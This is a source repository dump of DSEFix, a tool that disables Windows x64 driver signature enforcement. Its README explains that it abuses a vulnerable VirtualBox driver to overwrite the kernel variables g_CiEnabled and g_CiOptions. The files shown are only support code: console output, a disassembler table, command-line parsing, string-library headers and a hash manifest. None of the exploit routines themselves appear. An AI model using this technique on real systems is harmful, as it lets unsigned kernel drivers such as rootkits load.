/******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2014 - 2017 4 | * 5 | * TITLE: GLOBAL.H 6 | * 7 | * VERSION: 1.20 8 | * 9 | * DATE: 18 Apr 2017 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | #if !defined UNICODE 22 | #error ANSI build is not supported 23 | #endif 24 | 25 | #if (_MSC_VER >= 1900) 26 | #ifdef _DEBUG 27 | #pragma comment(lib, "vcruntimed.lib") 28 | #pragma comment(lib, "ucrtd.lib") 29 | #else 30 | #pragma comment(lib, "libvcruntime.lib") 31 | #endif 32 | #endif 33 | 34 | //disable nonmeaningful warnings. 35 | #pragma warning(disable: 4005) // macro redefinition 36 | #pragma warning(disable: 4054) // %s : from function pointer %s to data pointer %s 37 | #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s 38 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression 39 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 40 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u 41 | #pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER 42 | 43 | #include 44 | #include 45 | #include "ntdll\ntos.h" 46 | #include "minirtl\minirtl.h" 47 | #include "minirtl\cmdline.h" 48 | #include "cui\cui.h" 49 | #include "hde\hde64.h" 50 | #include "instdrv.h" 51 | #include "sup.h" 52 | #include "vbox.h" 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # DSEFix 3 | ## Windows x64 Driver Signature Enforcement Overrider 4 | 5 | For more info see Defeating x64 Driver Signature Enforcement http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3322. 6 | 7 | # System Requirements 8 | 9 | x64 Windows Vista/7/8/8.1/10. 10 | 11 | Windows 8.1/10: warning, see PatchGuard note below. 12 | 13 | DSEFix designed only for x64 Windows. 14 | 15 | Administrative privilege is required. 16 | 17 | # Build 18 | 19 | DSEFix comes with full source code. 20 | In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. 21 | 22 | # How it work 23 | 24 | It uses WinNT/Turla VirtualBox kernel mode exploit technique to overwrite global system variable controlling DSE behavior, which itself located in kernel memory space. Prior to Windows 8 it is ntoskrnl!g_CiEnabled - a boolean variable (0 disabled, 1 enabled) and starting from Windows 8 it is CI.DLL!g_CiOptions - combination of flags, where value of 6 is default options and value of 0 is equal to "no integrity checks". If you run DSEFix without parameters it will attempt to disable DSE in a way depending on the system version. If you run DSEFix with "-e" parameter (without quotes) it will attempt to restore DSE controlling variable to default state. 25 | 26 | # PatchGuard incompatibility 27 | 28 | Warning, starting from Windows 8.1 CI.DLL variables protected by Kernel Patch Protection (PatchGuard) as a generic data region. This doesn't mean instant PatchGuard response (BSOD) but will eventually lead to it when PatchGuard will be able to detect modification fact (doesn't really matter if you restore original state). Time of reaction is almost random. It can be almost instanst, or take a hour, two or four etc. 29 | 30 | # Deprecation 31 | 32 | DSEFix based on old Oracle VirtualBox driver which was created in 2008. This driver wasn't designed to be compatible with newest Windows operation system versions and may work incorrectly. Because DSEFix entirely based on this exact VirtualBox driver version LPE it is not wise to use it on newest version of Windows. Consider this repository as depricated/abandonware. The only possible updates can be related only to DSEFix software itself. 33 | 34 | # Authors 35 | 36 | (c) 2014 - 2018 DSEFix Project 37 | -------------------------------------------------------------------------------- /Source/DSEFix/cui/cui.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2017 4 | * 5 | * TITLE: CUI.C 6 | * 7 | * VERSION: 1.11 8 | * 9 | * DATE: 20 Mar 2017 10 | * 11 | * Console output. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #include "global.h" 20 | 21 | /* 22 | * cuiPrintTextA 23 | * 24 | * Purpose: 25 | * 26 | * Output text to the console or file. 27 | * 28 | * ANSI variant 29 | * 30 | */ 31 | VOID cuiPrintTextA( 32 | _In_ HANDLE hOutConsole, 33 | _In_ LPSTR lpText, 34 | _In_ BOOL ConsoleOutputEnabled, 35 | _In_ BOOL UseReturn 36 | ) 37 | { 38 | SIZE_T consoleIO; 39 | DWORD bytesIO; 40 | LPSTR Buffer; 41 | 42 | if (lpText == NULL) 43 | return; 44 | 45 | consoleIO = _strlen_a(lpText); 46 | if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) 47 | return; 48 | 49 | consoleIO = (5 + consoleIO); 50 | Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); 51 | if (Buffer) { 52 | 53 | _strcpy_a(Buffer, lpText); 54 | if (UseReturn) _strcat_a(Buffer, "\r\n"); 55 | 56 | consoleIO = _strlen_a(Buffer); 57 | 58 | if (ConsoleOutputEnabled != FALSE) { 59 | WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); 60 | } 61 | else { 62 | WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); 63 | } 64 | HeapFree(GetProcessHeap(), 0, Buffer); 65 | } 66 | } 67 | 68 | /* 69 | * cuiPrintTextW 70 | * 71 | * Purpose: 72 | * 73 | * Output text to the console or file. 74 | * 75 | * UNICODE variant 76 | * 77 | */ 78 | VOID cuiPrintTextW( 79 | _In_ HANDLE hOutConsole, 80 | _In_ LPWSTR lpText, 81 | _In_ BOOL ConsoleOutputEnabled, 82 | _In_ BOOL UseReturn 83 | ) 84 | { 85 | SIZE_T consoleIO; 86 | DWORD bytesIO; 87 | LPWSTR Buffer; 88 | 89 | if (lpText == NULL) 90 | return; 91 | 92 | consoleIO = _strlen(lpText); 93 | if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) 94 | return; 95 | 96 | consoleIO = (5 + consoleIO) * sizeof(WCHAR); 97 | Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); 98 | if (Buffer) { 99 | 100 | _strcpy(Buffer, lpText); 101 | if (UseReturn) _strcat(Buffer, TEXT("\r\n")); 102 | 103 | consoleIO = _strlen(Buffer); 104 | 105 | if (ConsoleOutputEnabled != FALSE) { 106 | WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); 107 | } 108 | else { 109 | WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); 110 | } 111 | HeapFree(GetProcessHeap(), 0, Buffer); 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /Source/DSEFix/hde/hde64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | * hde64.h: C/C++ header file 7 | * 8 | */ 9 | 10 | #ifndef _HDE64_H_ 11 | #define _HDE64_H_ 12 | 13 | /* stdint.h - C99 standard header 14 | * http://en.wikipedia.org/wiki/stdint.h 15 | * 16 | * if your compiler doesn't contain "stdint.h" header (for 17 | * example, Microsoft Visual C++), you can download file: 18 | * http://www.azillionmonkeys.com/qed/pstdint.h 19 | * and change next line to: 20 | * #include "pstdint.h" 21 | */ 22 | #include "pstdint.h" 23 | 24 | #define F_MODRM 0x00000001 25 | #define F_SIB 0x00000002 26 | #define F_IMM8 0x00000004 27 | #define F_IMM16 0x00000008 28 | #define F_IMM32 0x00000010 29 | #define F_IMM64 0x00000020 30 | #define F_DISP8 0x00000040 31 | #define F_DISP16 0x00000080 32 | #define F_DISP32 0x00000100 33 | #define F_RELATIVE 0x00000200 34 | #define F_ERROR 0x00001000 35 | #define F_ERROR_OPCODE 0x00002000 36 | #define F_ERROR_LENGTH 0x00004000 37 | #define F_ERROR_LOCK 0x00008000 38 | #define F_ERROR_OPERAND 0x00010000 39 | #define F_PREFIX_REPNZ 0x01000000 40 | #define F_PREFIX_REPX 0x02000000 41 | #define F_PREFIX_REP 0x03000000 42 | #define F_PREFIX_66 0x04000000 43 | #define F_PREFIX_67 0x08000000 44 | #define F_PREFIX_LOCK 0x10000000 45 | #define F_PREFIX_SEG 0x20000000 46 | #define F_PREFIX_REX 0x40000000 47 | #define F_PREFIX_ANY 0x7f000000 48 | 49 | #define PREFIX_SEGMENT_CS 0x2e 50 | #define PREFIX_SEGMENT_SS 0x36 51 | #define PREFIX_SEGMENT_DS 0x3e 52 | #define PREFIX_SEGMENT_ES 0x26 53 | #define PREFIX_SEGMENT_FS 0x64 54 | #define PREFIX_SEGMENT_GS 0x65 55 | #define PREFIX_LOCK 0xf0 56 | #define PREFIX_REPNZ 0xf2 57 | #define PREFIX_REPX 0xf3 58 | #define PREFIX_OPERAND_SIZE 0x66 59 | #define PREFIX_ADDRESS_SIZE 0x67 60 | 61 | #pragma pack(push,1) 62 | 63 | typedef struct { 64 | uint8_t len; 65 | uint8_t p_rep; 66 | uint8_t p_lock; 67 | uint8_t p_seg; 68 | uint8_t p_66; 69 | uint8_t p_67; 70 | uint8_t rex; 71 | uint8_t rex_w; 72 | uint8_t rex_r; 73 | uint8_t rex_x; 74 | uint8_t rex_b; 75 | uint8_t opcode; 76 | uint8_t opcode2; 77 | uint8_t modrm; 78 | uint8_t modrm_mod; 79 | uint8_t modrm_reg; 80 | uint8_t modrm_rm; 81 | uint8_t sib; 82 | uint8_t sib_scale; 83 | uint8_t sib_index; 84 | uint8_t sib_base; 85 | union { 86 | uint8_t imm8; 87 | uint16_t imm16; 88 | uint32_t imm32; 89 | uint64_t imm64; 90 | } imm; 91 | union { 92 | uint8_t disp8; 93 | uint16_t disp16; 94 | uint32_t disp32; 95 | } disp; 96 | uint32_t flags; 97 | } hde64s; 98 | 99 | #pragma pack(pop) 100 | 101 | #ifdef __cplusplus 102 | extern "C" { 103 | #endif 104 | 105 | /* __cdecl */ 106 | unsigned int hde64_disasm(const void *code, hde64s *hs); 107 | 108 | #ifdef __cplusplus 109 | } 110 | #endif 111 | 112 | #endif /* _HDE64_H_ */ 113 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/cmdline.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | BOOL GetCommandLineParamW( 4 | IN LPCWSTR CmdLine, 5 | IN ULONG ParamIndex, 6 | OUT LPWSTR Buffer, 7 | IN ULONG BufferSize, 8 | OUT PULONG ParamLen 9 | ) 10 | { 11 | ULONG c, plen = 0; 12 | TCHAR divider; 13 | 14 | if (ParamLen != NULL) 15 | *ParamLen = 0; 16 | 17 | if (CmdLine == NULL) { 18 | if ((Buffer != NULL) && (BufferSize > 0)) 19 | *Buffer = 0; 20 | return FALSE; 21 | } 22 | 23 | for (c = 0; c <= ParamIndex; c++) { 24 | plen = 0; 25 | 26 | while (*CmdLine == ' ') 27 | CmdLine++; 28 | 29 | switch (*CmdLine) { 30 | case 0: 31 | goto zero_term_exit; 32 | 33 | case '"': 34 | CmdLine++; 35 | divider = '"'; 36 | break; 37 | 38 | default: 39 | divider = ' '; 40 | } 41 | 42 | while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { 43 | plen++; 44 | if (c == ParamIndex) 45 | if ((plen < BufferSize) && (Buffer != NULL)) { 46 | *Buffer = *CmdLine; 47 | Buffer++; 48 | } 49 | CmdLine++; 50 | } 51 | 52 | if (*CmdLine != 0) 53 | CmdLine++; 54 | } 55 | 56 | zero_term_exit: 57 | 58 | if ((Buffer != NULL) && (BufferSize > 0)) 59 | *Buffer = 0; 60 | 61 | if (ParamLen != NULL) 62 | *ParamLen = plen; 63 | 64 | if (plen < BufferSize) 65 | return TRUE; 66 | else 67 | return FALSE; 68 | } 69 | 70 | BOOL GetCommandLineParamA( 71 | IN LPCSTR CmdLine, 72 | IN ULONG ParamIndex, 73 | OUT LPSTR Buffer, 74 | IN ULONG BufferSize, 75 | OUT PULONG ParamLen 76 | ) 77 | { 78 | ULONG c, plen = 0; 79 | TCHAR divider; 80 | 81 | if (CmdLine == NULL) 82 | return FALSE; 83 | 84 | if (ParamLen != NULL) 85 | *ParamLen = 0; 86 | 87 | for (c = 0; c <= ParamIndex; c++) { 88 | plen = 0; 89 | 90 | while (*CmdLine == ' ') 91 | CmdLine++; 92 | 93 | switch (*CmdLine) { 94 | case 0: 95 | goto zero_term_exit; 96 | 97 | case '"': 98 | CmdLine++; 99 | divider = '"'; 100 | break; 101 | 102 | default: 103 | divider = ' '; 104 | } 105 | 106 | while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) { 107 | plen++; 108 | if (c == ParamIndex) 109 | if ((plen < BufferSize) && (Buffer != NULL)) { 110 | *Buffer = *CmdLine; 111 | Buffer++; 112 | } 113 | CmdLine++; 114 | } 115 | 116 | if (*CmdLine != 0) 117 | CmdLine++; 118 | } 119 | 120 | zero_term_exit: 121 | 122 | if ((Buffer != NULL) && (BufferSize > 0)) 123 | *Buffer = 0; 124 | 125 | if (ParamLen != NULL) 126 | *ParamLen = plen; 127 | 128 | if (plen < BufferSize) 129 | return TRUE; 130 | else 131 | return FALSE; 132 | } 133 | 134 | char *ExtractFilePathA(const char *FileName, char *FilePath) 135 | { 136 | char *p = (char *)FileName, *p0 = (char *)FileName; 137 | 138 | if ((FileName == 0) || (FilePath == 0)) 139 | return 0; 140 | 141 | while (*FileName != 0) { 142 | if (*FileName == '\\') 143 | p = (char *)FileName + 1; 144 | FileName++; 145 | } 146 | 147 | while (p0 < p) { 148 | *FilePath = *p0; 149 | FilePath++; 150 | p0++; 151 | } 152 | 153 | *FilePath = 0; 154 | 155 | return FilePath; 156 | } 157 | 158 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath) 159 | { 160 | wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName; 161 | 162 | if ((FileName == 0) || (FilePath == 0)) 163 | return 0; 164 | 165 | while (*FileName != 0) { 166 | if (*FileName == '\\') 167 | p = (wchar_t *)FileName + 1; 168 | FileName++; 169 | } 170 | 171 | while (p0 < p) { 172 | *FilePath = *p0; 173 | FilePath++; 174 | p0++; 175 | } 176 | 177 | *FilePath = 0; 178 | 179 | return FilePath; 180 | } 181 | -------------------------------------------------------------------------------- /Source/DSEFix/hde/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /DSEFIX.sha256: -------------------------------------------------------------------------------- 1 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 *Compiled\dsefix.exe 2 | 8bfd211171da7352016077867ef164bcb7cafaa8c1e5d1333a31727638508b86 *Source\DSEFix\dsefix.sln 3 | 8203b795a2cfd828dbf247af478f86b0e34706168788c171e468836e2077cb11 *Source\DSEFix\dsefix.vcxproj 4 | 59990d4b58ec749baf522ed46684b03370e36fbcac6047880750637f99baa23f *Source\DSEFix\dsefix.vcxproj.filters 5 | 9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\DSEFix\dsefix.vcxproj.user 6 | 2617d004728e5be1761c812b1d9c37baa3c0a75a5e3e184a6cf29ebb0fc63145 *Source\DSEFix\global.h 7 | 572426f4a2fba6ba27a7b6835f679d03b2cf832aa42a8d878da895987855b91e *Source\DSEFix\instdrv.c 8 | 1cccbc67087666ccacfff518b968c9c6c8bf37cede271a46a30710bb5efa6a26 *Source\DSEFix\instdrv.h 9 | 9f9bd2440cdeb5a555db33fcb3903e7d117e3772cd503bca49b86bf1d80c949a *Source\DSEFix\main.c 10 | 6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6 *Source\DSEFix\resource.h 11 | fa8d835117bcaa307352b07ee7bd3043e34ebc1798d9d9e22b41634bf557c706 *Source\DSEFix\Resource.rc 12 | 93b467650e8b63f50a3b5f78ccc13e3ff7dd66963e5dca345f610781b99af2fe *Source\DSEFix\sup.c 13 | 2e7884b5f8074f1560cff5d4563a84f0785abb7a81a52003ae089a15dca6ca2b *Source\DSEFix\sup.h 14 | 41a6afaf85a029da7bb0e0637550047e0b2430d16cbeb3146347afdf65bf6697 *Source\DSEFix\vbox.h 15 | a557870fd68b2f9c66f31bf0e7c56eff04bd89dae70f98feb97332eaefbb1919 *Source\DSEFix\vboxdrv.h 16 | fa50246ce39db45fe5e8d7b4059392b8b36e3c3c91703fdf7aa2ed01c28fa119 *Source\DSEFix\cui\cui.c 17 | 6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\DSEFix\cui\cui.h 18 | 53a7ce27591e040b63880a3dd326b8ba8c97a0fa34d5e2d32aba89a0147434f6 *Source\DSEFix\hde\hde64.c 19 | e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\DSEFix\hde\hde64.h 20 | f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30 *Source\DSEFix\hde\pstdint.h 21 | b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\DSEFix\hde\table64.h 22 | 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\DSEFix\minirtl\cmdline.c 23 | bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\DSEFix\minirtl\cmdline.h 24 | 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\DSEFix\minirtl\minirtl.h 25 | b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\DSEFix\minirtl\rtltypes.h 26 | ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\DSEFix\minirtl\strtoi.c 27 | e16e3e2b02faac668a677d05cb03732548c3149058d74c3f0d285cf1cdfed30f *Source\DSEFix\minirtl\strtoi64.c 28 | 0320808115d42f04f63a382e8f386aa9bc77ba879892f5ccc94c40378b5131c8 *Source\DSEFix\minirtl\strtou64.c 29 | e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\DSEFix\minirtl\u64tohex.c 30 | f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\DSEFix\minirtl\ultohex.c 31 | 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\DSEFix\minirtl\ultostr.c 32 | 83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\DSEFix\minirtl\_strcat.c 33 | 2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1 *Source\DSEFix\minirtl\_strcmp.c 34 | ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\DSEFix\minirtl\_strcmpi.c 35 | 969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\DSEFix\minirtl\_strcpy.c 36 | 27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\DSEFix\minirtl\_strend.c 37 | 60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\DSEFix\minirtl\_strlen.c 38 | 97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94 *Source\DSEFix\minirtl\_strncmp.c 39 | 87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\DSEFix\minirtl\_strncmpi.c 40 | 0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\DSEFix\minirtl\_strncpy.c 41 | b29970b67a406364e4a8fef971e48383de176229a9333168bd03caa474d19e3b *Source\DSEFix\ntdll\ntos.h 42 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/minirtl.h: -------------------------------------------------------------------------------- 1 | /* 2 | Module name: 3 | minirtl.h 4 | 5 | Description: 6 | header for string handling and conversion routines 7 | 8 | Date: 9 | 1 Mar 2015 10 | */ 11 | 12 | #ifndef _MINIRTL_ 13 | #define _MINIRTL_ 14 | 15 | // string copy/concat/length 16 | 17 | char *_strend_a(const char *s); 18 | wchar_t *_strend_w(const wchar_t *s); 19 | 20 | char *_strcpy_a(char *dest, const char *src); 21 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src); 22 | 23 | char *_strcat_a(char *dest, const char *src); 24 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src); 25 | 26 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc); 27 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc); 28 | 29 | size_t _strlen_a(const char *s); 30 | size_t _strlen_w(const wchar_t *s); 31 | 32 | // comparing 33 | 34 | int _strcmp_a(const char *s1, const char *s2); 35 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2); 36 | 37 | int _strncmp_a(const char *s1, const char *s2, size_t cchars); 38 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars); 39 | 40 | int _strcmpi_a(const char *s1, const char *s2); 41 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2); 42 | 43 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars); 44 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars); 45 | 46 | char *_strstr_a(const char *s, const char *sub_s); 47 | wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s); 48 | 49 | char *_strstri_a(const char *s, const char *sub_s); 50 | wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s); 51 | 52 | // conversion of integer types to string, returning string length 53 | 54 | size_t ultostr_a(unsigned long x, char *s); 55 | size_t ultostr_w(unsigned long x, wchar_t *s); 56 | 57 | size_t ultohex_a(unsigned long x, char *s); 58 | size_t ultohex_w(unsigned long x, wchar_t *s); 59 | 60 | size_t itostr_a(int x, char *s); 61 | size_t itostr_w(int x, wchar_t *s); 62 | 63 | size_t i64tostr_a(signed long long x, char *s); 64 | size_t i64tostr_w(signed long long x, wchar_t *s); 65 | 66 | size_t u64tostr_a(unsigned long long x, char *s); 67 | size_t u64tostr_w(unsigned long long x, wchar_t *s); 68 | 69 | size_t u64tohex_a(unsigned long long x, char *s); 70 | size_t u64tohex_w(unsigned long long x, wchar_t *s); 71 | 72 | // string to integers conversion 73 | 74 | unsigned long strtoul_a(char *s); 75 | unsigned long strtoul_w(wchar_t *s); 76 | 77 | unsigned long long strtou64_a(char *s); 78 | unsigned long long strtou64_w(wchar_t *s); 79 | 80 | unsigned long hextoul_a(char *s); 81 | unsigned long hextoul_w(wchar_t *s); 82 | 83 | int strtoi_a(char *s); 84 | int strtoi_w(wchar_t *s); 85 | 86 | signed long long strtoi64_a(char *s); 87 | signed long long strtoi64_w(wchar_t *s); 88 | 89 | unsigned long long hextou64_a(char *s); 90 | unsigned long long hextou64_w(wchar_t *s); 91 | 92 | /* =================================== */ 93 | 94 | #ifdef 